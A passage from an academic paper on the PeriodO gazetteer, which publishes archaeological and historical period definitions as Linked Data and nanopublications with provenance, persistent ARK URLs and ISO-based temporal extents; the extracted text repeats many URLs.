http://dx.doi.org/10.7717/peerj-cs.44 Figure 1 Turtle representation of a PeriodO period collection containing two period definitions originally published by Belarte (2008). Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 7/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 the Web. Most of our initial contributors of period definitions work in archaeology, a discipline that has several large, well-curated, interlinked, widely used and well-maintained Linked Data datasets (Isaksen et al., 2014). Thus, we take advantage of the recent W3C Recommendation of JSON-LD (Sporny, Kellogg & Lanthaler, 2014) to make the PeriodO dataset available as Linked Data. By providing a JSON-LD context for the PeriodO dataset, we have made it usable within an RDF-based stack. RDF vocabularies The JSON-LD context maps relationships between PeriodO entities to terms from RDF vocabularies. Of these, the most important is SKOS (Hobbs & Pan, 2006). The human-readable labels for a PeriodO definition are mapped to the SKOS prefLabel and altLabel properties, implying that a PeriodO period definition can be interpreted as a SKOS Concept. The relationship between a period definition and the period collection to which it belongs is mapped to the SKOS inScheme property, implying that a period collection is a SKOS ConceptScheme. The relationship between a period collection and its source is mapped to the DCMI source term, and the various properties in the bibliographic description of the source are mapped to their own appropriate DCMI terms. Finally, the relation between a period definition and its geographical extent is mapped to the DCMI spatial term. The relationships between a period definition and the start and end of its tem- poral extent are respectively mapped to the OWL-Time intervalStartedBy and intervalFinishedBy properties. This implies that a period definition, in addition to being a SKOS Concept, is an OWL-Time ProperInterval (an interval of time having non-zero duration). Importantly, it also implies that the start and end of a period definition’s temporal extent are themselves ProperIntervals, not points or instants. This is important because the beginnings and endings of historical periods can never be precisely determined. In the example of the Classical Iberian Period given above, both the beginning and the end of the period are interpreted as intervals with a duration of one year. Interpreting period starts and ends as ProperIntervals allows us to make a distinction between the intervals themselves and their descriptions: though the intervals themselves are not precisely specifiable, we can create pragmatic OWL-Time DateTimeDescriptions of them for the purposes of comparison and visualization. The start and end of a period definition’s temporal extent are themselves intervals with their own starts and ends, so temporal extent can be associated with a maximum of four values. This is interoperable with other proposed representations of fuzzy, imprecise, or uncertain temporal extents, such as the four start, stop, earliest, latest keys proposed for GeoJSON-LD (Gillies, 2015). In the current PeriodO data set these four properties only have (ISO 8601) year values, because none of our sources specified endpoints at a more granular level than year. However, we expect to have finer-grained values as we add periodizations of more recent history. At that point we will need to decide upon a unit of representation that makes it simple to compare intervals defined at different levels of granularity. Adding complexity to time interval expressions will be Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 8/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 possible without changing our underlying data model because of the flexibility of our current approach. The start, latest start, earliest end, end approach enables us to represent the most common patterns for defining periods found in our sources. For example a period defined as starting “3000 B.C. (±150 years)” and ending “about 2330 B.C.” can be represented with three values: −3149, −2849, and −2329. Kauppinen et al. (2010) propose defining curves over intervals to represent fuzziness, imprecision, or uncertainty in order to maximize precision and recall with respect to temporal relevance judgments made by experts. We have chosen not to support such more complex representations at this time because we are focused primarily on representing periods as defined in textual sources. Natural language is already a compact and easily indexable way to represent imprecision or uncertainty. Rather than imposing an arbitrary mapping from natural language to parameterized curves, we prefer to maintain the original natural language terms used. However if scholars begin defining periods with parameterized curves (which is certainly possible) then we will revisit this decision. Modeling provenance To model the provenance of period assertions, we used the Provenance Ontology (McGuin- ness, Lebo & Sahoo, 2013). We record each change to the dataset (a patch) as a prov:Activity. This Activity has prov:startedAtTime and prov:endedAtTime values representing timestamps when the patch was sent and accepted, respectively. The Activity additionally has two prov:used statements: one which refers to the specific version of the entire dataset to which the patch was applied (for example, http://n2t. net/ark:/99152/p0d?version=1), and one referring to the patch itself as a prov:Entity. The patch Entity contains a URL to the JSON-Patch file which resulted in the change Activity (Nottingham & Bryan, 2013). Finally, the Activity has prov:generated statements for each of the period collections and period assertions (implied to be of the type prov:Entity) that were affected by the given patch. Each of these affected entities has a prov:specializationOf statement that refers to the permanent identifier for the period assertion or collection (with no particular version specified). If the affected entities are revisions of an existing entity, they have prov:wasRevisionOf statements that refer to the version that they were descended from. We publish a changelog at http://n2t.net/ark:/99152/p0h#changelog that represents the sequential list of prov:Activity entities that created the current version of the dataset as an ordered RDF list. In this way, one can reconstruct the origin of each change to the dataset as a whole, or to individual period assertions. Minting long-term URLs In addition to mapping relationships to well-known vocabularies, interpreting PeriodO as Linked Data requires a way to assign URLs to period collections and definitions. As shown in Fig. 1, period definitions and period collections in the dataset are given short identifiers: p06xc6mvjx2 identifies the definition of the Classical Iberian Period, and p06xc6m identifies the collection to which it belongs. But these identifiers are only useful Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 9/18 https://peerj.com/computer-science/ http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0d?version=1 http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://n2t.net/ark:/99152/p0h#changelog http://dx.doi.org/10.7717/peerj-cs.44 within the context of the PeriodO dataset; they are not guaranteed to be unique in a global context and, unless one already has the PeriodO data, one cannot resolve them to obtain representations of the entities they identify. URLs, on the other hand, are globally unique and can be resolved using HTTP to obtain representations; this is the core concept behind Linked Data. So, we need a way to turn the short PeriodO identifiers into URLs. To turn PeriodO identifiers into URLs we rely on the ARK identifier scheme (Starr et al., 2012) provided by the California Digital Library (CDL). First, we include in the JSON-LD context a @base value specifying the base URI (http://n2t.net/ark:/99152/p0) to use when interpreting the PeriodO dataset as Linked Data. This allows the short PeriodO identifiers to be interpreted as URLs; for example p06xc6mvjx2 is interpreted as a relative reference to the URL http://n2t.net/ark:/99152/p06xc6mvjx2. The hostname of this URL (n2t.net) is the registered name of the CDL’s Name-to-Thing resolver, which is similar to other name resolution services for persistent URLs such as PURL. We have registered with the EZID service a single ARK identifier (ark:/99152/p0), providing them with the URL of the HTTP server currently hosting the canonical PeriodO dataset. Thus any request to a URL starting with http://n2t.net/ark:/99152/p0 will be redirected to that server. An HTTP GET to http://n2t.net/ark:/99152/p0d.jsonld will return the entire dataset, while GETting (for example) http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld will return a JSON-LD representation of Belarte’s definition of the “Classical Iberian Period.” PERIOD ASSERTIONS AS NANOPUBLICATIONS We created the PeriodO dataset based on the same core concerns of nanopublication authors: to extract, curate, and publish small, computable concepts from their broader sources while still preserving their provenance. A nanopublication is made up of an assertion, the provenance of that assertion, and the provenance of the nanopublication itself. In PeriodO, these are: • Assertion: the definition of a period. • Provenance: the source this period was derived from. This may be a citation of a printed work or a URL for a resource hosted on the web. • Provenance of nanopublication: the history of the period definition within the PeriodO system, including the date it was added or changed, the identity of the person who submitted or changed it, and the identity of the person who approved additions or changes. Figure 1 shows two period definitions with the same provenance. Each of these definitions is represented by an individual nanopublication. The nanopublication for the “Early Iberian Period” is shown in Fig. 2. While PeriodO period definitions readily map to the nanopublication scheme, we faced several challenges during our creation of the dataset due to its interpretive nature. The unfalsifiable nature of time period definitions The current version of the Nanopublication Guidelines includes a note suggesting that the guidelines be amended to state that an assertion published as a nanopublication should be Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 10/18 https://peerj.com/computer-science/ http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p06xc6mvjx2 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p0d.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://n2t.net/ark:/99152/p06xc6mvjx2.jsonld http://dx.doi.org/10.7717/peerj-cs.44 Figure 2 Nanopublication of Belarte (2008)’s definition of the “Early Iberian Period”. “a proposition that is falsifiable, that is to say we can test whether the proposition is true or false” (Groth et al., 2013). Were this amendment to be made, PeriodO nanopublications would be in violation of the guidelines, as period definitions in PeriodO, like most of the information produced in the humanities, are neither testable nor falsifiable. Consider the Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 11/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 assertion “there is a period called the Late Bronze Age in Northern Europe, and it lasted from about 1100 B.C. to 500 B.C.” The “Late Bronze Age” is a purely discursive construct. There was no discrete entity called the “Late Bronze Age” before it was named by those studying that time and place. Consequently, one cannot disprove the idea that there was a time period called the “Late Bronze Age” from around 1100 B.C. to 500 B.C.; one can only argue that another definition has more credence based on non-experimental, discursive arguments. The proposed falsifiability requirement makes sense in certain contexts. Computational biologists, for example, wish to connect, consolidate, and assess trillions of measurements scattered throughout a rapidly growing body of research findings. Their goal is to create a global, connected knowledge graph that can be used as a tool for scientists to guide new discoveries and verify experimental results. In the PeriodO context, however, we are not concerned with making an exhaustive taxonomy of “correct” periods or facilitating the “discovery” of new periods (a non sequitur—there are no periods that exist in the world that are awaiting discovery by some inquiring historian or archaeologist). Instead we are interested in enabling the study and citation of how and by whom time has been segmented into different periods. It is not necessary that these segmentations be falsifiable to achieve this goal; they only need to be comparable. Kuhn et al. (2013) expressed concern that requiring formal representation for all scientific data published as nanopublications “seems to be unrealistic in many cases and might restrict the range of practical application considerably.” Similarly, requiring assertions to be unambiguous and falsifiable would unnecessarily restrict the practical application of nanopublication. The nature of nanopublication assertions should ultimately be determined by the practical needs of the researchers who use them. What is important about nanopublications is not the nature of the assertions, but the expression of provenance. Provenance is particularly important for non-scientific datasets, since the assertions made are so dependent on their wider discursive context. When assertions cannot be tested experimentally, understanding context is critical for judging quality, trustworthiness, and usefulness. The critical role of curation Another difference between the PeriodO dataset and traditional nanopublications is the unavoidable curatorial work necessary to extract practically useful assertions from textual period definitions. In all of the applications of nanopublications we found, the published assertions typically appeared in the form of measurements or well-defined relationships between discrete entities. These are types of data which humans or computers can easily and reliably extract from research findings. Our dataset, in contrast, required explicit curatorial decisions: a time period exists within a certain spatiotemporal context, and there is no sure way to discretely, accurately, and unambiguously model such boundaries. While a human might be able to have a nuanced understanding of temporary and ever-shifting political boundaries or the uncertain and partially arbitrary precision suggested by “around the beginning of the 12th century BC,” we cannot assume the same of computers. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 12/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 Therefore, in order for our dataset to be readily algorithmically comparable, we had to map discursive concepts to discrete values. Our curatorial decisions in this regard reflect a compromise between uniformity, potential semantic expressiveness, and practical usefulness. As humanities scholars publish their own nanopublications (or linked data in general), they will go through similar curatorial processes due to the interpretive, unstandardized nature of humanities datasets discussed above. There is a temptation in this process to imagine perfect structured descriptions that could express all possible nuances of all possible assertions. However, chasing that goal can lead to overcomplexity and, in the end, be practically useless. In describing period assertions as linked data, we adopted a schema that was only as semantically complicated as was (a) expressed in our collected data and (b) necessitated by the practical needs of our intended users. As we started to collect data, we considered the basic characteristics of a dataset that would be necessary to accomplish the retrieval and comparison tasks that our intended users told us were most important. These tasks included: • Finding how the definition of periods have differed across time/authors, or finding contested period definitions. (“How have different authors defined the Early Bronze Age?”) • Finding all periods within a certain span of time. (“What time periods have been used to describe years between 100 AD to 500 AD?”). • Finding all periods within a certain geographic area. (“What time periods have scholars used in Northern Europe?”) • Finding periods defined for different languages. (“What time periods have been defined in Ukranian?”) Figure 3 shows how these various tasks can be completed using the faceted browsing in- terface to the PeriodO dataset. Implementing this interface required imposing consistency upon how we represented the temporal and spatial coverage of period definitions, even though this consistency does not exist in the original sources. Our initial approach to imposing consistency on temporal extents was to express the termini of periods as Julian Days represented in scientific notation. Julian Days are a standard form of time measurement commonly used by astronomers to represent dates in the far historical past. Julian Days work by counting the number of continuous days that have passed since January 1, 4713 BC in the Proleptic Julian calendar. Conceptually, this is a similar measurement to the common Unix time standard, which counts the number of milliseconds that have passed since midnight GMT on January 1, 1970. The idea is that by counting forward using well-defined units since an accepted epoch, one can escape the inconsistencies and periodic lapses that characterize different calendrical systems. Representing Julian Days using scientific notation allows one to express variable levels of uncertainty. See examples of this notation system in Table 1. However, in practice, we found this scheme to be overly complex. The imposition of a level of uncertainty, while theoretically useful in certain cases, was often not appropriate. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 13/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 Figure 3 Finding and comparing period definitions in PeriodO. Searching for “early bronze” (1) results in sixty period definitions with matching labels (2), from a variety of sources (3). The time range facet (4) updates to show the distribution of temporal extents defined by these various sources. Users can query for period definitions with temporal extents within a specific range of years using the time range facet (5), period definitions with spatial extents within a named geographic area using the spatial coverage facet (6), or period definitions in specific languages using the language facet (7). Queries may combine values from any of these facets. Table 1 Example scientific notation of Julian days. Scientific notation Julian day (JDN) Proleptic gregorian 1.3E6 Between JDN 1,250,000 and JDN 1,350,000 1150 BC ± 150 years 1.30E6 Between JDN 1,295,000 and JDN 1,305,000 1150 BC ± 15 years 1.300E6 Between JDN 1,299,500 and JDN 1,300,500 1150 BC ± 1.5 years In almost every single case that we observed, authors did not explicitly state a precise level of uncertainty for their temporal expressions. By adding precise uncertainty ourselves, we would, in effect, have been putting words in authors’ mouths. Further, Julian Days are not widely used outside of very specific disciplines, meaning that consumers of our data would have to convert to a more familiar time system before being able to understand or use our data. Instead of the Julian Day model, we settled on the four-part ISO date schema, described above. This model is less expressive for complicated forms of uncertainty, but it is less complex and more easily understood by both our target audience and typical software programs. ISO dates were simple to convert to, since nearly all of the period assertions we observed were drawn from sources based on Western calendars. If and when we encounter period definitions that require more complex time expressions or are based on varying calendrical systems, we will revisit the question of whether the four-part scheme is sufficient. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 14/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 Figure 4 Part of the interface for editing period definitions. Labels for temporal extent boundaries are taken verbatim from the source, entered as free text, and automatically parsed into ISO 8601 year representations. Labels for spatial coverage are entered as free text, and using an autocompletion interface the user can specify the modern-day administrative units (e.g., nation-states) that approximate this spatial coverage. To encourage a consistent representation of temporal extent for all period definitions, we built a simple grammar and parser for date expressions that covered the vast majority of our sample data. The parser takes in a string like “c. mid-12th century” and outputs a JSON string consistent with our data model. It can also produce naı̈ve interpretations of descriptions like “mid-fifth century,” assigning them to the third of the epoch described according to the conventional segmentation of “early,” “mid,” and “late,” “Mid-fifth century” would, then, be parsed as the range of years 401–434. The parser is intended to be used interactively, as a generator of suggestions for standard ways to represent certain forms of time description. To keep the quality of the gazetteer high, we do not intend for the parser to be used to fully automatically “extract” period definitions from texts. Similarly, we created an autocomplete interface to modern political entities to allow users to enter spatial coverage. These interface components help curators produce a practical approximation of spatiotemporal coverage rather than a complete, unambiguous representation. The interface we created to allow users to add and edit period definitions is shown in Fig. 4. PROJECT STATUS AND FUTURE WORK As of late 2015, we have gathered just over 3,500 period definitions from 78 sources, including monographs, journal articles, and online databases. Each period has been assigned a permanent URL, which can be resolved to view its definition and provenance as HTML, JSON-LD, or Turtle. Several projects have begun to use our gazetteer to add spatiotemporal information to their work, including the Open Context research data repository (http://opencontext.org), the ARIADNE archaeological research data infrastructure project (http://ariadne-infrastructure.eu), and the Portable Antiquities Scheme database of archaeological finds in the UK (https://finds.org.uk). Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 15/18 https://peerj.com/computer-science/ http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk http://dx.doi.org/10.7717/peerj-cs.44 As more projects begin to integrate PeriodO identifiers for time periods, we hope to gather information on their citation and use. This would include both studying the histor- ical use of attributed period definitions as well as tracking the citation of PeriodO period identifiers going forward. Such a study would allow us to observe how periods come into circulation and fall out of favor. Tracing the connections fostered by use of our gazetteer would demonstrate the potential benefits of a linked data approach in the humanities. We are also in the process of reaching out to period-defining communities beyond classical archaeology and ancient history. We expect that this will require some extensions of and revisions to the current PeriodO data model. First, as we begin to collect definitions of periods closer to the present, we expect to extend our model of temporal extent to allow for more fine-grained interval boundaries than years. This will require a unit of representation that allows comparisons between intervals defined at different levels of granularity. (The approach based on Julian Days, described in Table 1, may be useful for this.) Second, as we begin to include more non-Western period definitions, we will need to ensure that we can still map years to ISO 8601 representations. At the very least, this will require extending the temporal expression parser, and it may require changes to the data model as well, for example to state explicitly the calendar system used by the original authors. Finally, as more historians begin publishing their work as datasets or software, we may begin to encounter periods defined not in natural language but using some formalism, such as the curves proposed by Kauppinen et al. (2010). These will require us to find a way of including these formalisms directly in our definitions. CONCLUSION As scholars of all disciplines continue to integrate computational methods into their work, the need to preserve provenance will only become more important. This is as true in the humanities and social sciences as it is in the natural sciences. Nanopublication is an useful way to locate the production of “data” within a wider scholarly context. In this way, it echoes old ideas about hypertext which were concerned with relations of provenance, authorship, and attribution (Nelson, 1999). The PeriodO period gazetteer shows that this approach is relevant and feasible even to fields outside of the experimental, observable sciences. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was generously funded by a Digital Humanities Start-Up Grant from the National Endowment for the Humanities (grant number HD-51864-14). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Endowment for the 